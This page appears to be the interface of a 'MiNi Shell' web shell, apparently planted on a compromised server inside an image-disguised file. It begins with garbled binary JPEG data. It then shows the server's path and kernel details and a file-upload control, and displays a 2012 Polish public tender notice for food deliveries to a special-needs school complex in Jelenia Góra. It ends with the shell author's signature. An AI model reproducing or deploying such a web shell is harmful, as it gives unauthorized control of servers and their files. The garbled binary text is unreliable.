JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120322/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120322/66159-N-2012.html

<p class="kh_header"><b>Jelenia Góra: Dostawa artykułów spożywczych do Zespołu Szkół i Placówek Specjalnych</b><br>
<b>Numer ogłoszenia: 66159 - 2012; data zamieszczenia: 22.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół i Placówek Specjalnych , ul. Kruszwicka 3, 58-500 Jelenia Góra, woj. dolnośląskie, tel. 0-75 7678963, 7538723, faks 0-75 7538726.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych do Zespołu Szkół i Placówek Specjalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywne dostawy artykułów spożywczych w pakietach., Część 1-mleko, nabiał, art. spożywcze CPV 15000000-8, 15500000-3, Część 2-mięso, drób, art. wędliniarskie CPV 15100000-9; Część 3 -warzywa, owoce CPV 15300000-1; Część 4-ryby mrożone, warzywa mrożone 152200006; 15331177-9; Część 5-chleb,artykuły piekarnicze CPV 15810000-9; Część 6 - pierogi, uszka, kluski i inne wyroby mączne CPV 15851000-8. 
Część 1-mleko, nabiał, art. spożywcze CPV 15000000-8, 15500000-3, Cukier 1120 kg, dżem truskawkowy Łowicz słoik 280 g 170 szt., herbata Saga (300 szt. w paczce)  paczka 420g 80szt, jajka kl. L szt. 8300, kasza jęczmienna kg 180, kasza manna 30 kg, kawa inka paczka 150g szt. 80, kompot czarna porzeczka szt. 380, kompot truskawka Frubex 880g szt. 60,
Kompot wiśniowy Frubex 900 g szt. 80,
Mąka wrocławska kg 180, makaron nitki Goliard 250g szt. 320, makaron świderki kg 310, margaryna Kasia 250 g szt. 160, masło mixełko łaciate 200 g szt. 1500, masło wiejskie 200 g szt. 1150, mąka Diamant kg 100, mleko folia 2% litr 3400, ogórek konserwowy Frubex słoik g 900 szt. 130, olej Oleo szt. 460, ryż kg 250, ser żółty Gouda plastry kg 160, sól kg 190, śmietana Mlekovita 30% litr 760, twaróg półtłusty kg 250; 

Część 2-mięso, drób, art. wędliniarskie CPV 15100000-9; boczek wędzony 45 kg, filet z kurczaka 190 kg, filet indyk kg 60, karczek b/kości 500 kg, kiełbasa śląska 210 kg, kiełbasa surowa biała kg 90, krakowska podsuszana kg 40, kurczak kg 50, łopatka b/kości kg 600, parówki wieprzowe mediolanki kg 80, porcje rosołowe kg 330, porce rosołowe ze skrzydełkami kg 570, schab b/kości kg 200, schab z kością kg 150, mięso szynka b/kości kg 370, szynka biała kg 10, szynka drobiowa delikatesowa kg 36, szynka tradycyjna kg 30, udko z kurczaka kg 280, wołowina pieczeniowa kg 100, wątroba drobiowa kg 75, parówki bananowe kg 70;


Część 3 -warzywa, owoce CPV 15300000-1; , banany 650 kg, buraki 390 kg, cebula 350 kg, cytryny 18 kg, jabłka Champion 1300 kg, kapusta biała 300 kg, kapusta czerwona 40 kg, kapusta kiszona 520 kg, kapusta pekińska 220 kg, mandarynki 100 kg, marchew korzeń 200 kg, ogórki kiszone op.500g 360 szt,, pieczarki 90 kg, pietruszka korzeń 25 kg, , pomidor 120 kg, seler 25 kg, Ziemniaki 8100 kg 


 Część 4-ryby mrożone, warzywa mrożone CPV 152200006; 15331170-9; bukiet warzyw królewski 190 kg, Dorsz SHP 370 kg, fasola szparagowa 80 kg, frytki Firma LUTOSA 200 kg, groszek 50 kg, makrela wędzona 110 kg, marchew kostka 140 kg, mieszanka kompotowa z pestką 230 kg, mintaj filet 70kg, miruna filet 200 kg, śledź po wiejsku 65 kg, truskawka mrożona 200 kg, warzywa na patelnię 50 kg,  włoszczyzna paski 690 kg, zupa jarzynowa 100 kg, zupa kalafiorowa kg 100;


Część 5-chleb,artykuły piekarnicze CPV 15810000-9; babka piaskowa 400 g szt. 180, bułka drożdżowa szt. 1600, bułka grahamka szt. 800, bułka tarta kg 80, bułka z dynią szt. 3000, bułka zwykła duża szt. 1000, bułka zwykła mała szt. 5000, chleb krojony  60kg szt. 1750, chleb wiejski szt. 400, chleb wieloziarnisty szt. 300, ciasto jabłecznik kg 100, ciasto sernik z brzoskwinią kg 90, ciasto sernik z czekoladą kg 90, kawiarka duża szt. 450, pączek szt. 400.

, 
Część 6 - pierogi, uszka, kluski i inne wyroby mączne CPV 15851000-8 Pierogi z mięsem świeże 300 kg, pierogi ruskie świeże 400 kg, pierogi z kapustą i grzybami świeże 220 kg, kluski śląskie świeże 250 kg, kopytka świeże 350 kg, kluski leniwe 150 kg, pierogi z jagodami świeże 40 kg, krokiety z serem i pieczarkami świeże 160 szt. 

Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia zamawianych dostaw o 20% w związku z nowym rokiem szkolnym i możliwą zmianą ilości uczniów, której Zamawiający nie jest w stanie obecnie dokładnie określić. Wykonawca dostarczy i rozładuje przedmiot zamówienia na wskazane przez zamawiającego miejsce na terenie Zespołu Szkół i Placówek Specjalnych przy ul. Kruszwickiej 3 i przy ul. Grottgera 1. Dostawy przedmiotu zamówienia odbywać się będą sukcesywnie raz - dwa razy w tygodniu po telefonicznym zamówieniu złożonym przez osoby upoważnione przez Zamawiającego w przeddzień dostawy w dni robocze w godzinach 7.00-15.00 transportem wykonawcy, przeznaczonym do przewozu artykułów spożywczych , zgodnie z przepisami wydanymi na podstawie ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia ( Dz. U. z 2006 r. Nr 171 poz. 1225 z późniejszymi zmianami). Artykuły spożywcze muszą spełniać wymagania wszystkich odpowiednich norm oraz posiadać wszelkie niezbędne dokumenty i atesty dopuszczające do obrotu na terenie kraju. Zamówienia będą realizowane przez okres 12 miesięcy od dnia podpisania umowy...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Artykuły spożywcze w pakietach., Część 1-mleko, nabiał, art. spożywcze CPV 15000000-8, 15500000-3, Część 2-mięso, drób, art. wędliniarskie CPV 15100000-9; Część 3 -warzywa, owoce CPV 15300000-1; Część 4-ryby, warzywa mrożone CPV 152200006; 15331177-9; Część 5-chleb,artykuły piekarnicze CPV 15810000-9; Część 6 - pierogi, uszka, kluski i inne wyroby mączne CPV 15851000-8. Zamawiający zastrzega sobie prawo zwiększenia zamawianych dostaw o 20 %.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3, 15.10.00.00-9, 15.30.00.00-1, 15.22.00.00-6, 15.33.11.77-9, 15.81.00.00-9, 15.85.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie, że dostawy spełniają wszystkie odpowiednie normy oraz posiadają wszelkie niezbędne dokumenty i atesty dopuszczające do obrotu na terenie kraju.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.um-jeleniagora.dolnyslask.pl;  zsips.jgnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół i Placówek Specjalnych  58-500 Jelenia Góra ul. Kruszwicka 3
tel 757538723 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.03.2012 godzina 10:00, miejsce: Zespół Szkół i Placówek Specjalnych  58-500 Jelenia Góra ul. Kruszwicka 3
tel 757538723 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com